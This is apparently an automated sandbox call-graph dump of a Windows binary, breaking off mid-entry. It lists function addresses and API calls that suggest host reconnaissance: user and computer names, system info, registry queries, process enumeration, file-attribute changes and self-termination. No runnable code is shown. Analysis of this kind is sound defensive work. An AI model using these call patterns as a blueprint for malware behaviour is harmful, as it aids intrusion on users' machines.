104132 489ec94 104132->104127 104754 4874a1d 12 API calls 104132->104754 104740 4872a0d 13 API calls 104134->104740 104139 489ec44 104741 4874729 104139->104741 104145 4874fc1 13 API calls 104146 489ec5d 104145->104146 104148 4875195 11 API calls 104146->104148 104150 489ec6e 104148->104150 104149 489eced 104151 489ecf1 104149->104151 104152 489ed02 104149->104152 104153 484520d 11 API calls 104150->104153 104154 4844f7d 11 API calls 104151->104154 104155 4856e99 11 API calls 104152->104155 104156 489ec77 104153->104156 104157 489ed00 104154->104157 104158 489ed16 104155->104158 104159 4874631 15 API calls 104156->104159 104188 489edd0 104157->104188 104767 4857599 104157->104767 104765 4870d31 11 API calls 104158->104765 104162 489ec80 Sleep 104159->104162 104161 489ed1e 104163 489ed33 104161->104163 104164 489ed22 104161->104164 104162->104121 104168 4856e99 11 API calls 104163->104168 104166 4844f7d 11 API calls 104164->104166 104166->104157 104170 489ed47 104168->104170 104169 4857599 11 API calls 104174 489edb3 104169->104174 104766 4870d31 11 API calls 104170->104766 104171 489edfc 104788 4871cd5 11 API calls 104171->104788 104174->104188 104775 487202d 104174->104775 104176 489ed4f 104178 489ed53 104176->104178 104179 489ed64 104176->104179 104181 4844f7d 11 API calls 104178->104181 104182 4844f7d 11 API calls 104179->104182 104180 489edc5 104783 4848b09 104180->104783 104181->104157 104182->104157 104183 489eeb5 104186 4875195 11 API calls 104183->104186 104184 489ee04 104184->104183 104789 4874f89 13 API calls 104184->104789 104189 489eec2 104186->104189 104188->104171 104193 489f171 104188->104193 104787 4872995 13 API calls 104188->104787 104195 4875195 11 API calls 104189->104195 104190 489ee1f 104191 484520d 11 API calls 104190->104191 104192 489ee2c 104191->104192 104196 4875a5d 12 API calls 104192->104196 104828 4844f4d 104193->104828 104202 489eee4 104195->104202 104198 489ee34 104196->104198 104198->104183 104199 489ee38 104198->104199 104790 48743c1 35 API calls 104199->104790 104201 489eff2 104808 486f779 222 API calls 104201->104808 104202->104201 104797 4869c8d 11 API calls 104202->104797 104203 489ee44 104791 48699d1 19 API calls 104203->104791 104207 489ee4c 104792 4849741 11 API calls 104207->104792 104208 489eff7 104211 4856e99 11 API calls 104208->104211 104209 489ef0c 104209->104201 104212 4856e99 11 API calls 104209->104212 104214 489f00e 104211->104214 104215 489ef28 104212->104215 104213 489ee57 104793 48743c1 35 API calls 104213->104793 104809 4870d31 11 API calls 104214->104809 104798 4870d31 11 API calls 104215->104798 104219 489ee61 104794 4874f89 13 API calls 104219->104794 104220 489ef30 104224 489ef54 104220->104224 104225 489ef34 104220->104225 104222 489f036 104811 486bdfd 44 API calls 104222->104811 104800 4875285 12 API calls 104224->104800 104228 4856e99 11 API calls 104225->104228 104226 489ee69 104229 484520d 11 API calls 104226->104229 104227 489f03b GetCurrentThreadId 104812 4871cd5 11 API calls 104227->104812 104233 489ef48 104228->104233 104234 489ee76 104229->104234 104231 489f019 104231->104222 104810 486e3a5 157 API calls 104231->104810 104799 4870d31 11 API calls 104233->104799 104795 4872a0d 13 API calls 104234->104795 104235 489ef5c 104239 484520d 11 API calls 104235->104239 104242 489ef69 104239->104242 104240 489ef50 104240->104224 104243 489ef83 104240->104243 104241 489ee7e 104244 4874729 13 API calls 104241->104244 104801 4873e49 17 API calls 104242->104801 104246 4856e99 11 API calls 104243->104246 104249 489ee8b 104244->104249 104252 489ef97 104246->104252 104247 489f053 104248 489f12f 104247->104248 104813 4874f89 13 API calls 104247->104813 104253 4875e39 12 API calls 104248->104253 104796 4874f89 13 API calls 104249->104796 104250 489ef74 104251 4844f7d 11 API calls 104250->104251 104256 489ef81 104251->104256 104802 4870d31 11 API calls 104252->104802 104258 489f139 104253->104258 104805 486f235 79 API calls 104256->104805 104262 489f151 104258->104262 104822 486d7d9 12 API calls 104258->104822 104259 489f074 104263 484520d 11 API calls 104259->104263 104260 489ee97 104264 484520d 11 API calls 104260->104264 104261 489ef9f 104261->104256 104803 48438ed 22 API calls 104261->104803 104824 4874f89 13 API calls 104262->104824 104267 489f084 104263->104267 104265 489eea4 104264->104265 104270 4874631 15 API calls 104265->104270 104273 4875a5d 12 API calls 104267->104273 104277 489eead 104270->104277 104272 489f147 104823 48727ad GetFileAttributesA SetFileAttributesA 104272->104823 104280 489f08f 104273->104280 104274 489f15c 104825 48727ad GetFileAttributesA SetFileAttributesA 104274->104825 104275 489efe4 104806 486de4d CloseHandle 104275->104806 104277->104183 104278 489efb3 104804 4873e49 17 API calls 104278->104804 104280->104248 104814 4874f89 13 API calls 104280->104814 104282 489f167 104826 486da41 SetThreadExecutionState 104282->104826 104283 489efe9 104283->104201 104807 487522d Sleep TerminateProcess 104283->104807 104286 489efc4 104290 4844f7d 11 API calls 104286->104290 104288 489f16c 104827 489d2d5 327 API calls 104288->104827 104290->104256 104291 489f0a2 104292 484520d 11 API calls 104291->104292 104294 489f0b2 104292->104294 104815 4872a0d 13 API calls 104294->104815 104296 489f0bd 104816 4874f89 13 API calls 104296->104816 104298 489f0c8 104299 484520d 11 API calls 104298->104299 104300 489f0d8 104299->104300 104817 4872a0d 13 API calls 104300->104817 104302 489f0e3 104818 4874f89 13 API calls 104302->104818 104304 489f0ee 104305 484520d 11 API calls 104304->104305 104306 489f0fe 104305->104306 104819 4872a0d 13 API calls 104306->104819 104308 489f109 104820 4874f89 13 API calls 104308->104820 104310 489f114 104311 484520d 11 API calls 104310->104311 104312 489f124 104311->104312 104821 4872a0d 13 API calls 104312->104821 104315 4844c3c 104314->104315 105179 4844b99 104315->105179 104319 4876685 LoadLibraryA 104318->104319 104320 487669a 104319->104320 104320->104088 104322 4844f7d 11 API calls 104321->104322 104323 4874fd0 104322->104323 104324 4875e39 12 API calls 104323->104324 104325 4874fd7 104324->104325 104326 4874fe2 104325->104326 104327 4875935 12 API calls 104325->104327 104326->104088 104327->104326 104329 48b3efd 104328->104329 104329->104096 104331 4847334 104330->104331 104332 4844c09 47 API calls 104331->104332 104333 4847340 104332->104333 104334 4844f7d 104333->104334 104335 4844f91 104334->104335 104336 4844f81 104334->104336 104337 4844fbf 104335->104337 104837 4843585 11 API calls 104335->104837 104336->104335 104832 4844fed 104336->104832 104337->104103 104341 4872119 104340->104341 104341->104341 104839 4871e41 104341->104839 104349 4872167 104350 485a8b1 11 API calls 104349->104350 104351 4872172 104350->104351 104352 485b811 11 API calls 104351->104352 104353 487217d 104352->104353 104354 4845465 11 API calls 104353->104354 104355 487218f 104354->104355 104356 4874941 15 API calls 104355->104356 104357 4872197 104356->104357 104358 4875e39 12 API calls 104357->104358 104359 487219f 104358->104359 104360 48721a7 104359->104360 104361 487224a 104359->104361 104363 4874941 15 API calls 104360->104363 104362 4874f89 13 API calls 104361->104362 104364 4872252 104362->104364 104365 48721af 104363->104365 104366 484520d 11 API calls 104364->104366 104367 484520d 11 API calls 104365->104367 104368 4872260 104366->104368 104369 48721bd 104367->104369 104370 4875a5d 12 API calls 104368->104370 104371 4875a5d 12 API calls 104369->104371 104372 4872268 104370->104372 104373 48721c5 104371->104373 104374 48722b7 104372->104374 104375 487226c 104372->104375 104376 4872217 104373->104376 104377 48721c9 104373->104377 104378 4874f89 13 API calls 104374->104378 104379 4874729 13 API calls 104375->104379 104380 4874941 15 API calls 104376->104380 104381 4874729 13 API calls 104377->104381 104382 48722bf 104378->104382 104383 4872279 104379->104383 104384 487221f 104380->104384 104385 48721d6 104381->104385 104386 484520d 11 API calls 104382->104386 104387 485b811 11 API calls 104383->104387 104388 484520d 11 API calls 104384->104388 104389 485b811 11 API calls 104385->104389 104390 48722cd 104386->104390 104391 4872284 104387->104391 104392 487222d 104388->104392 104393 48721e1 104389->104393 104394 4873e49 17 API calls 104390->104394 104395 4844f7d 11 API calls 104391->104395 104396 4873e49 17 API calls 104392->104396 104397 4844f7d 11 API calls 104393->104397 104398 48722d8 104394->104398 104399 4872291 104395->104399 104400 4872238 104396->104400 104401 48721ee 104397->104401 104403 4844f7d 11 API calls 104398->104403 104404 4874f89 13 API calls 104399->104404 104405 4844f7d 11 API calls 104400->104405 104402 4874941 15 API calls 104401->104402 104406 48721f6 104402->104406 104407 4872212 104403->104407 104408 4872299 104404->104408 104405->104407 104409 484520d 11 API calls 104406->104409 104410 485a8b1 11 API calls 104407->104410 104411 484520d 11 API calls 104408->104411 104413 4872204 104409->104413 104414 48722f2 104410->104414 104412 48722a7 104411->104412 104415 4874631 15 API calls 104412->104415 104416 4874631 15 API calls 104413->104416 104417 485b811 11 API calls 104414->104417 104415->104407 104416->104407 104418 48722fd 104417->104418 104419 4844f7d 11 API calls 104418->104419 104420 487230a 104419->104420 104421 4844f4d 11 API calls 104420->104421 104422 4872324 104421->104422 104423 4875a5d 104422->104423 104424 4875a6d 104423->104424 104425 4875a81 104424->104425 104913 4875a11 104424->104913 104427 4844f29 11 API calls 104425->104427 104428 4875aa4 104427->104428 104428->104109 104730 4874631 104428->104730 104430 48751ad 104429->104430 104925 485a8b1 104430->104925 104437 4848b09 11 API calls 104438 4875204 104437->104438 104439 4844f4d 11 API calls 104438->104439 104440 487521e 104439->104440 104441 484520d 104440->104441 104442 4845250 104441->104442 104443 4845211 104441->104443 104442->104118 104444 4844f7d 104443->104444 104445 484521b 104443->104445 104446 4844f91 104444->104446 104452 4844fed 11 API calls 104444->104452 104447 4845245 104445->104447 104448 484522e 104445->104448 104449 4844fbf 104446->104449 104981 4843585 11 API calls 104446->104981 104450 4845535 11 API calls 104447->104450 104451 4845535 11 API calls 104448->104451 104449->104118 104453 4845233 104450->104453 104451->104453 104452->104446 104453->104118 104456 4875e49 104455->104456 104457 4875e82 104456->104457 104460 4875e7a GetFileAttributesA 104456->104460 104458 4844f29 11 API calls 104457->104458 104459 4875ea1 104458->104459 104459->104132 104460->104457 104462 485bd05 104461->104462 104463 485bcf2 104461->104463 104465 4875e39 12 API calls 104462->104465 104982 4874295 104463->104982 104467 485bd21 104465->104467 104466 485bcfa 104468 4848b09 11 API calls 104466->104468 104469 485bd33 104467->104469 104470 4875e39 12 API calls 104467->104470 104468->104462 104471 4844f7d 11 API calls 104469->104471 104472 485bd2f 104470->104472 104521 485bd3f 104471->104521 104472->104469 104473 485bd4b 104472->104473 104475 4875e39 12 API calls 104473->104475 104474 4844f4d 11 API calls 104477 485c1ef 104474->104477 104476 485bd55 104475->104476 104478 485bd71 104476->104478 104479 485bd59 104476->104479 104597 4870f91 104477->104597 104481 4875e39 12 API calls 104478->104481 104480 4844f7d 11 API calls 104479->104480 104480->104521 104482 485bd7b 104481->104482 104483 485bd8d 104482->104483 104484 4875e39 12 API calls 104482->104484 104485 4844f7d 11 API calls 104483->104485 104486 485bd89 104484->104486 104485->104521 104486->104483 104487 485bda5 104486->104487 104488 4875e39 12 API calls 104487->104488 104489 485bdaf 104488->104489 104490 485bdc1 104489->104490 104491 4875e39 12 API calls 104489->104491 104492 4844f7d 11 API calls 104490->104492 104493 485bdbd 104491->104493 104492->104521 104493->104490 104494 485bdd9 104493->104494 104495 4875e39 12 API calls 104494->104495 104496 485bde3 104495->104496 104497 485bdf5 104496->104497 104498 4875e39 12 API calls 104496->104498 104499 4844f7d 11 API calls 104497->104499 104500 485bdf1 104498->104500 104499->104521 104500->104497 104501 485be0d 104500->104501 104502 485be2f 104501->104502 104503 4875e39 12 API calls 104501->104503 104504 4844f7d 11 API calls 104502->104504 104505 485be2b 104503->104505 104504->104521 104505->104502 104506 485be47 104505->104506 104507 4875e39 12 API calls 104506->104507 104508 485be51 104507->104508 104509 485be55 104508->104509 104510 485be66 104508->104510 104511 4844f7d 11 API calls 104509->104511 104512 485be92 104510->104512 104513 485be7a 104510->104513 104511->104521 104515 485bea6 104512->104515 104516 485bebe 104512->104516 104514 4844f7d 11 API calls 104513->104514 104514->104521 104517 4844f7d 11 API calls 104515->104517 104518 485bed2 104516->104518 104519 485beea 104516->104519 104517->104521 104520 4844f7d 11 API calls 104518->104520 104522 485bf16 104519->104522 104523 485befe 104519->104523 104520->104521 104521->104474 104525 485bf3b 104522->104525 104526 485bf2a 104522->104526 104524 4844f7d 11 API calls 104523->104524 104524->104521 104528 485bf60 104525->104528 104529 485bf4f 104525->104529 104527 4844f7d 11 API calls 104526->104527 104527->104521 104531 485bf85 104528->104531 104532 485bf74 104528->104532 104530 4844f7d 11 API calls 104529->104530 104530->104521 104534 485bf99 104531->104534 104535 485bfaa 104531->104535 104533 4844f7d 11 API calls 104532->104533 104533->104521 104536 4844f7d 11 API calls 104534->104536 104537 485bfcf 104535->104537 104538 485bfbe 104535->104538 104536->104521 104540 485bfe3 104537->104540 104541 485bffb 104537->104541 104539 4844f7d 11 API calls 104538->104539 104539->104521 104542 4844f7d 11 API calls 104540->104542 104543 485c020 104541->104543 104544 485c00f 104541->104544 104542->104521 104546 485c045 104543->104546 104547 485c034 104543->104547 104545 4844f7d 11 API calls 104544->104545 104545->104521 104549 485c059 104546->104549 104550 485c06a 104546->104550 104548 4844f7d 11 API calls 104547->104548 104548->104521 104551 4844f7d 11 API calls 104549->104551 104552 485c08f 104550->104552 104553 485c07e 104550->104553 104551->104521 104555 485c0b4 104552->104555 104556 485c0a3 104552->104556 104554 4844f7d 11 API calls 104553->104554 104554->104521 104558 4875e39 12 API calls 104555->104558 104557 4844f7d 11 API calls 104556->104557 104557->104521 104559 485c0be 104558->104559 104560 485c0d3 104559->104560 104561 485c0c2 104559->104561 104563 485c0e7 104560->104563 104564 485c0ff 104560->104564 104562 4844f7d 11 API calls 104561->104562 104562->104521 104565 4844f7d 11 API calls 104563->104565 104566 4875e39 12 API calls 104564->104566 104565->104521 104567 485c109 104566->104567 104568 485c125 104567->104568 104569 485c10d 104567->104569 104571 4875e39 12 API calls 104568->104571 104570 4844f7d 11 API calls 104569->104570 104570->104521 104572 485c12f 104571->104572 104573 485c144 104572->104573 104574 485c133 104572->104574 104575 4875e39 12 API calls 104573->104575 104576 4844f7d 11 API calls 104574->104576 104577 485c14e 104575->104577 104576->104521 104578 485c167 104577->104578 104579 485c152 104577->104579 104581 4875e39 12 API calls 104578->104581 104580 4844f7d 11 API calls 104579->104580 104580->104521 104582 485c171 104581->104582 104583 485c175 104582->104583 104584 485c183 104582->104584 104585 4844f7d 11 API calls 104583->104585 104586 4875e39 12 API calls 104584->104586 104585->104521 104587 485c18d 104586->104587 104588 485c1a6 104587->104588 104589 485c191 104587->104589 104591 4875e39 12 API calls 104588->104591 104590 4844f7d 11 API calls 104589->104590 104590->104521 104592 485c1b0 104591->104592 104593 485c1b4 104592->104593 104594 485c1c2 104592->104594 104595 4844f7d 11 API calls 104593->104595 104596 4844f7d 11 API calls 104594->104596 104595->104521 104596->104521 104598 4870f99 104597->104598 104599 4875195 11 API calls 104598->104599 104600 487100d 104599->104600 104601 4844f7d 11 API calls 104600->104601 104602 487101a 104601->104602 104603 4871045 104602->104603 104604 4871024 104602->104604 104606 484d49d 11 API calls 104603->104606 104605 484d49d 11 API calls 104604->104605 104607 4871031 104605->104607 104606->104607 104608 4875195 11 API calls 104607->104608 104609 4871071 104608->104609 105010 484d49d 104609->105010 104611 487107c 104612 4875195 11 API calls 104611->104612 104613 487109c 104612->104613 104614 4845019 11 API calls 104613->104614 104615 48710d3 104614->104615 104616 4844fc1 11 API calls 104615->104616 104617 48710de 104616->104617 105015 4873f0d 104617->105015 104619 48710ee 104620 4844fc1 11 API calls 104619->104620 104621 48710f9 104620->104621 104622 4845465 11 API calls 104621->104622 104623 487110f 104622->104623 104624 4871150 104623->104624 104625 487111e 104623->104625 104627 4875a5d 12 API calls 104624->104627 105075 4874a1d 12 API calls 104625->105075 104628 487115a 104627->104628 104630 487122d 104628->104630 105076 4870e09 17 API calls 104628->105076 104629 487112b 104631 48576c9 16 API calls 104629->104631 104633 4856e99 11 API calls 104630->104633 104688 4871141 104631->104688 104635 487124c 104633->104635 104634 4875e39 12 API calls 104636 48712ec 104634->104636 105027 487453d 104635->105027 104637 48712fa 104636->104637 105069 4875935 104636->105069 104640 4875e39 12 API calls 104637->104640 104642 4871304 104640->104642 104641 487116f 105077 486f521 11 API calls 104641->105077 104645 4871312 104642->104645 104648 4875935 12 API calls 104642->104648 104643 4871285 105031 484919d 104643->105031 104649 4871326 104645->104649 104650 487131c 104645->104650 104646 4871194 104646->104630 104656 4856e99 11 API calls 104646->104656 104648->104645 104655 4844f4d 11 API calls 104649->104655 105080 48727ad GetFileAttributesA SetFileAttributesA 104650->105080 104652 4856e99 11 API calls 104657 48712a8 104652->104657 104653 4871254 104653->104643 105078 4874a1d 12 API calls 104653->105078 104658 4871340 104655->104658 104659 48711ae 104656->104659 105035 48576c9 104657->105035 104689 4894aa9 104658->104689 104662 487453d 11 API calls 104659->104662 104665 48711b6 104662->104665 104663 48712b5 105046 484aac5 GetLocalTime 104663->105046 104664 4871280 105079 487522d Sleep TerminateProcess 104664->105079 104665->104630 104668 48711ba 104665->104668 104669 484919d 42 API calls 104668->104669 104671 48711c2 104669->104671 104670 48712ba 104674 484914d 11 API calls 104670->104674 104672 4856e99 11 API calls 104671->104672 104673 48711dd 104672->104673 104675 48576c9 16 API calls 104673->104675 104676 48712d0 104674->104676 104677 48711ea 104675->104677 104678 4844f7d 11 API calls 104676->104678 104679 4856e99 11 API calls 104677->104679 104680 48712dd 104678->104680 104681 48711fc 104679->104681 105051 4870e75 104680->105051 104683 48576c9 16 API calls 104681->104683 104684 4871209 104683->104684 104685 4856e99 11 API calls 104684->104685 104686 487121b 104685->104686 104687 4844f7d 11 API calls 104686->104687 104687->104688 104688->104634 104690 4856e99 11 API calls 104689->104690 104691 4894ada 104690->104691 105156 4870d31 11 API calls 104691->105156 104693 4894aeb 104696 4856e99 11 API calls 104693->104696 104694 4894ae2 104694->104693 105157 48948b1 17 API calls 104694->105157 104697 4894afa 104696->104697 105158 4870d31 11 API calls 104697->105158 104699 4894b02 104700 4894b1d 104699->104700 104701 4856e99 11 API calls 104699->104701 104706 4894b2f 104700->104706 105160 489496d 11 API calls 104700->105160 104703 4894b15 104701->104703 105159 4870d31 11 API calls 104703->105159 104704 4894b26 104704->104706 105161 487522d Sleep TerminateProcess 104704->105161 104708 4856e99 11 API calls 104706->104708 104709 4894b3e 104708->104709 105162 4870d31 11 API calls 104709->105162 104711 4894b46 104712 4894b71 104711->104712 104713 4856e99 11 API calls 104711->104713 104714 4856e99 11 API calls 104712->104714 104715 4894b59 104713->104715 104716 4894b80 104714->104716 104717 484919d 42 API calls 104715->104717 105164 4870d31 11 API calls 104716->105164 104723 4894b61 104717->104723 104719 4894b88 104720 4894bc5 104719->104720 104722 4856e99 11 API calls 104719->104722 104721 4844f4d 11 API calls 104720->104721 104724 4894bdf 104721->104724 104725 4894b9b 104722->104725 104723->104712 105163 487522d Sleep TerminateProcess 104723->105163 104755 4856e99 104724->104755 104726 484919d 42 API calls 104725->104726 104728 4894ba3 104726->104728 104728->104720 105165 487522d Sleep TerminateProcess 104728->105165 104733 4874646 104730->104733 104731 4874687 104732 4844f4d 11 API calls 104731->104732 104734 48746a1 104732->104734 104733->104731 104735 484545d 11 API calls 104733->104735 104739 487522d Sleep TerminateProcess 104734->104739 104736 4874673 104735->104736 105166 487459d 104736->105166 104739->104109 104740->104139 104742 4874748 104741->104742 105173 4843991 QueryPerformanceCounter 104742->105173 104744 4874752 104745 4844fc1 11 API calls 104744->104745 104746 487475f 104745->104746 104747 4844f29 11 API calls 104746->104747 104749 4874766 104747->104749 104748 4845111 11 API calls 104748->104749 104749->104748 104750 484520d 11 API calls 104749->104750 104751 4874796 104749->104751 104750->104749 104752 4844f4d 11 API calls 104751->104752 104753 48747b0 104752->104753 104753->104145 104754->104127 104756 4856ec6 104755->104756 104757 4856efa 104756->104757 104762 4856ecc 104756->104762 104758 4856ef8 104757->104758 104759 4844f29 11 API calls 104757->104759 104760 4844f29 11 API calls 104758->104760 104759->104758 104761 4856f17 104760->104761 104764 4870d31 11 API calls 104761->104764 104763 4845465 11 API calls 104762->104763 104763->104758 104764->104149 104765->104161 104766->104176 104768 48575c3 104767->104768 104769 48575ff 104768->104769 104772 4845111 11 API calls 104768->104772 104770 4844f4d 11 API calls 104769->104770 104771 4857634 104770->104771 104771->104169 104773 48575ec 104772->104773 104774 48452c5 11 API calls 104773->104774 104774->104769 105176 4847a51 104775->105176 104777 4872044 GetUserNameA 104778 4872067 104777->104778 104779 487205a 104777->104779 104780 4844f29 11 API calls 104778->104780 104781 4845535 11 API calls 104779->104781 104782 4872065 104780->104782 104781->104782 104782->104180 104784 4848b1a 104783->104784 104785 4845535 11 API calls 104784->104785 104786 4848b25 104785->104786 104786->104188 104787->104171 104788->104184 104789->104190 104790->104203 104791->104207 104792->104213 104793->104219 104794->104226 104795->104241 104796->104260 104797->104209 104798->104220 104799->104240 104800->104235 104801->104250 104802->104261 104803->104278 104804->104286 104805->104275 104806->104283 104807->104201 104808->104208 104809->104231 104810->104222 104811->104227 104812->104247 104813->104259 104814->104291 104815->104296 104816->104298 104817->104302 104818->104304 104819->104308 104820->104310 104821->104248 104822->104272 104823->104262 104824->104274 104825->104282 104826->104288 104830 4844f53 104828->104830 104829 4844f79 104829->104088 104830->104829 105178 4843585 11 API calls 104830->105178 104833 4845015 104832->104833 104834 4844ff1 104832->104834 104833->104335 104838 4843555 11 API calls 104834->104838 104836 4844ffe 104836->104335 104837->104337 104838->104836 104877 4875071 104839->104877 104841 4871e59 104842 4871ebd 104841->104842 104843 4875071 14 API calls 104842->104843 104844 4871ee8 104843->104844 104845 4871eed 104844->104845 104846 4871ef8 104844->104846 104895 4874bc1 11 API calls 104845->104895 104848 4844f7d 11 API calls 104846->104848 104849 4871ef6 104848->104849 104890 4871ea9 GetSystemInfo 104849->104890 104851 4871f10 104891 484914d 104851->104891 104854 48452c5 11 API calls 104855 4871f30 104854->104855 104856 4844f29 11 API calls 104855->104856 104857 4871f45 104856->104857 104858 4872089 104857->104858 104901 4843c09 104858->104901 104861 48720cc 104906 4874e31 13 API calls 104861->104906 104862 48720e8 104863 4844f29 11 API calls 104862->104863 104866 48720e6 104863->104866 104903 48455c9 104866->104903 104868 48452c5 104869 48452d6 104868->104869 104870 4845313 104869->104870 104871 48452fc 104869->104871 104872 4844fed 11 API calls 104870->104872 104907 4845535 104871->104907 104874 4845309 104872->104874 104875 4845344 104874->104875 104876 4844f7d 11 API calls 104874->104876 104876->104875 104885 4844f29 104877->104885 104879 487508e 104880 48750b5 RegOpenKeyExA 104879->104880 104881 48750c0 104880->104881 104882 48750ff RegCloseKey 104880->104882 104883 48750d9 RegQueryValueExA 104881->104883 104882->104841 104883->104882 104884 48750e7 104883->104884 104884->104882 104886 4844f2f 104885->104886 104887 4844f4a 104885->104887 104886->104887 104889 4843585 11 API calls 104886->104889 104887->104879 104889->104887 104890->104851 104892 4849163 104891->104892 104896 4845019 104892->104896 104895->104849 104897 4844fed 11 API calls 104896->104897 104898 4845029 104897->104898 104899 4844f29 11 API calls 104898->104899 104900 4845041 104899->104900 104900->104854 104902 4843c1d GetComputerNameW 104901->104902 104902->104861 104902->104862 104904 48455dd 104903->104904 104905 48455cf SysFreeString 104903->104905 104904->104868 104905->104904 104906->104866 104908 4845542 104907->104908 104912 4845572 104907->104912 104910 4844fed 11 API calls 104908->104910 104911 484554e 104908->104911 104909 4844f29 11 API calls 104909->104911 104910->104912 104911->104874 104912->104909 104914 4875a21 104913->104914 104919 48759c9 104914->104919 104917 4844f29 11 API calls 104918 4875a4e 104917->104918 104918->104425 104923 4845405 104919->104923 104922 48759de 104922->104917 104924 4845409 GetFileAttributesA 104923->104924 104924->104922 104926 485a8c5 104925->104926 104951 485a735 104926->104951 104929 485b811 104930 485b832 104929->104930 104963 485b79d 104930->104963 104935 4844f29 11 API calls 104938 485b85d 104935->104938 104936 4845111 11 API calls 104936->104938 104937 48452c5 11 API calls 104937->104938 104938->104936 104938->104937 104939 485b8c4 104938->104939 104940 4844f4d 11 API calls 104939->104940 104941 485b8de 104940->104941 104942 4844f29 11 API calls 104941->104942 104943 485b8e6 104942->104943 104944 4845465 104943->104944 104945 4845497 104944->104945 104947 484546a 104944->104947 104946 4844f29 11 API calls 104945->104946 104948 484548d 104946->104948 104947->104945 104949 484547e 104947->104949 104948->104437 104950 4845019 11 API calls 104949->104950 104950->104948 104952 485a75d 104951->104952 104953 4844f29 11 API calls 104952->104953 104955 485a867 104953->104955 104956 484520d 11 API calls 104955->104956 104957 485a88b 104955->104957 104960 4845111 104955->104960 104956->104955 104958 4844f29 11 API calls 104957->104958 104959 485a8a0 104958->104959 104959->104929 104961 4845019 11 API calls 104960->104961 104962 484511e 104961->104962 104962->104955 104964 485b7b1 104963->104964 104971 485b621 104964->104971 104967 4844fc1 104969 4844fc5 104967->104969 104968 4844fe9 104968->104935 104969->104968 104980 4843585 11 API calls 104969->104980 104973 485b649 104971->104973 104972 4844f29 11 API calls 104975 485b753 104972->104975 104973->104972 104973->104973 104974 4845111 11 API calls 104974->104975 104975->104974 104976 484520d 11 API calls 104975->104976 104977 485b777 104975->104977 104976->104975 104978 4844f29 11 API calls 104977->104978 104979 485b78c 104978->104979 104979->104967 104980->104968 104981->104449 104991 485bba9 104982->104991 104984 48742c9 104996 485bbc9 104984->104996 104986 4874349 CloseHandle 104986->104466 104989 4874300 104989->104986 104990 48452c5 11 API calls 104989->104990 105001 485bbe9 104989->105001 104990->104989 105006 485b92d 104991->105006 104994 485bbc3 104994->104984 104995 485bbb8 CreateToolhelp32Snapshot 104995->104984 104997 485b92d 17 API calls 104996->104997 104998 485bbd4 104997->104998 104999 485bbe3 104998->104999 105000 485bbd8 Process32First 104998->105000 104999->104989 105000->104989 105002 485b92d 17 API calls 105001->105002 105003 485bbf4 105002->105003 105004 485bc03 105003->105004 105005 485bbf8 Process32Next 105003->105005 105004->104989 105005->104989 105007 485ba71 105006->105007 105008 485b93c GetModuleHandleA 105006->105008 105007->104994 105007->104995 105008->105007 105009 485b951 16 API calls 105008->105009 105009->105007 105011 4844f7d 11 API calls 105010->105011 105012 484d4ac 105011->105012 105013 484d4cc 105012->105013 105014 484520d 11 API calls 105012->105014 105013->104611 105014->105013 105016 4873f37 105015->105016 105081 4846409 105016->105081 105018 4873f4b 105019 4846409 11 API calls 105018->105019 105020 4873f81 105019->105020 105084 4873ebd 105020->105084 105022 4873fa7 105023 4845535 11 API calls 105022->105023 105026 4873fb8 105023->105026 105024 487400f 105024->104619 105026->105024 105088 484545d 105026->105088 105028 487454f 105027->105028 105029 4844f29 11 API calls 105028->105029 105030 487458d 105029->105030 105030->104653 105032 48491ad 105031->105032 105033 48491ce 105032->105033 105111 4848a75 42 API calls 105032->105111 105033->104652 105036 48576f4 105035->105036 105037 4857715 CharNextA 105036->105037 105045 4857728 105036->105045 105037->105036 105038 48577f0 105038->104663 105039 4845019 11 API calls 105039->105045 105041 4857758 CharNextA 105041->105045 105042 4857794 CharNextA 105042->105045 105043 48577b5 CharNextA 105044 48577d2 CharNextA 105043->105044 105043->105045 105044->105044 105044->105045 105045->105038 105045->105039 105045->105041 105045->105042 105045->105043 105045->105044 105112 4848f01 11 API calls 105045->105112 105113 484a8fd 105046->105113 105052 4870e9a 105051->105052 105123 4856b1d 105052->105123 105055 4857599 11 API calls 105056 4870eb8 105055->105056 105057 4856b1d 12 API calls 105056->105057 105058 4870ec5 105057->105058 105059 4857599 11 API calls 105058->105059 105060 4870ed4 105059->105060 105061 4857599 11 API calls 105060->105061 105062 4870ee6 105061->105062 105063 484520d 11 API calls 105062->105063 105064 4870f0a 105063->105064 105141 4870d95 105064->105141 105066 4870f2b 105067 4844f4d 11 API calls 105066->105067 105068 4870f4c 105067->105068 105068->104688 105070 4875945 105069->105070 105151 48758bd 105070->105151 105073 4844f29 11 API calls 105074 4875972 105073->105074 105074->104637 105075->104629 105076->104641 105077->104646 105078->104664 105079->104643 105080->104649 105094 484625d 105081->105094 105085 4873ed0 105084->105085 105086 4846409 11 API calls 105085->105086 105087 4873ee6 105086->105087 105087->105022 105089 4845411 105088->105089 105090 4844fed 11 API calls 105089->105090 105091 484544c 105089->105091 105092 4845428 105090->105092 105091->105026 105092->105091 105110 4843585 11 API calls 105092->105110 105095 4846280 105094->105095 105099 484629b 105094->105099 105096 484628b 105095->105096 105106 484365d 11 API calls 105095->105106 105107 4846255 11 API calls 105096->105107 105101 48462eb 105099->105101 105108 484365d 11 API calls 105099->105108 105100 4846296 105100->105018 105104 48462fd 105101->105104 105109 4843555 11 API calls 105101->105109 105104->105100 105105 484625d 11 API calls 105104->105105 105105->105104 105106->105096 105107->105100 105108->105101 105109->105104 105110->105091 105111->105033 105112->105045 105114 484a915 105113->105114 105115 484a923 105114->105115 105121 4848a5d 42 API calls 105114->105121 105117 484a755 105115->105117 105118 484a778 105117->105118 105119 484a786 105118->105119 105122 4848a5d 42 API calls 105118->105122 105119->104670 105121->105115 105122->105119 105124 4856b4d 105123->105124 105125 4844f29 11 API calls 105124->105125 105131 4856b68 105124->105131 105127 4856bba 105125->105127 105126 4856ca2 105126->105131 105150 48454a5 11 API calls 105126->105150 105127->105126 105136 4856beb CharNextA 105127->105136 105138 4845111 11 API calls 105127->105138 105139 4844fc1 11 API calls 105127->105139 105140 48452c5 11 API calls 105127->105140 105149 4848db5 11 API calls 105127->105149 105129 4844f4d 11 API calls 105130 4856cd1 105129->105130 105132 4844f29 11 API calls 105130->105132 105131->105129 105133 4856cd9 105132->105133 105134 4844f29 11 API calls 105133->105134 105135 4856ce1 105134->105135 105135->105055 105136->105127 105138->105127 105139->105127 105140->105127 105142 4870dae 105141->105142 105143 4873f0d 11 API calls 105142->105143 105144 4870dd7 105143->105144 105145 4874631 15 API calls 105144->105145 105146 4870de2 105145->105146 105147 4844f4d 11 API calls 105146->105147 105148 4870dfc 105147->105148 105148->105066 105149->105127 105150->105131 105152 48758cd 